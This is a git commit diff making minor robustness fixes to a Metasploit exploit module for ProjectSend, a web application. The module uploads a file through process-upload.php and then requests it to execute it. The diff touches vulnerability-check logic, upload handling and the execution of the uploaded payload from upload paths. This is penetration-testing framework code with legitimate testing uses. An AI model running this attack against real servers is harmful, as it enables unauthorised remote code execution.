Do minor cleanup

jvazquez-r7 · jvazquez-r7 · commit b5b0be90010e · 2014-12-26T11:24:02.000-06:00
diff --git a/modules/exploits/unix/webapp/projectsend_upload_exec.rb b/modules/exploits/unix/webapp/projectsend_upload_exec.rb
@@ -67,20 +67,20 @@ def check
     elsif res.code.to_i == 500
       vprint_error("#{peer} - Unable to write file")
       return Exploit::CheckCode::Safe
-    elsif res.code.to_i == 200 && res.body =~ /<\?php/
+    elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
       vprint_error("#{peer} - File process-upload.php is not executable")
       return Exploit::CheckCode::Safe
-    elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
+    elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/
       vprint_error("#{peer} - Software is misconfigured")
       return Exploit::CheckCode::Safe
-    elsif res.code.to_i == 200 && res.body =~ /jsonrpc/
+    elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/
       # response on revision 118 onwards includes the file name
-      if res.body =~ /NewFileName/
+      if res.body && res.body =~ /NewFileName/
         return Exploit::CheckCode::Vulnerable
       # response on revisions 100 to 117 does not include the file name
-      elsif res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
+      elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
         return Exploit::CheckCode::Appears
-      elsif res.body =~ /Failed to open output stream/
+      elsif res.body && res.body =~ /Failed to open output stream/
         vprint_error("#{peer} - Upload folder is not writable")
         return Exploit::CheckCode::Safe
       else
@@ -113,14 +113,14 @@ def upload
       fail_with(Failure::NotFound, "#{peer} - No process-upload.php found")
     elsif res.code.to_i == 500
       fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
-    elsif res.code.to_i == 200 && res.body =~ /Failed to open output stream/
+    elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/
       fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable")
-    elsif res.code.to_i == 200 && res.body =~ /<\?php/
+    elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
       fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable")
-    elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
+    elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/
       fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured")
     # response on revision 118 onwards includes the file name
-    elsif res.code.to_i == 200 && res.body =~ /NewFileName/
+    elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/
       print_good("#{peer} - Payload uploaded successfully (#{fname})")
       return fname
     # response on revisions 100 to 117 does not include the file name
@@ -139,10 +139,10 @@ def upload
   def exec(upload_path)
     print_status("#{peer} - Executing #{upload_path}...")
     res = send_request_raw(
-      'uri' => normalize_uri(target_uri.path, upload_path)
+      { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5
     )
     if !res
-      print_error("#{peer} - Request timed out while executing")
+      print_status("#{peer} - Request timed out while executing")
     elsif res.code.to_i == 404
       vprint_error("#{peer} - Not found: #{upload_path}")
     elsif res.code.to_i == 200
@@ -159,6 +159,8 @@ def exploit
     fname = upload
     register_files_for_cleanup(fname)
     exec("upload/files/#{fname}") # default for r-221 onwards
-    exec("upload/temp/#{fname}")  # default for r-100 to r-219
+    unless session_created?
+      exec("upload/temp/#{fname}")  # default for r-100 to r-219
+    end
   end
 end
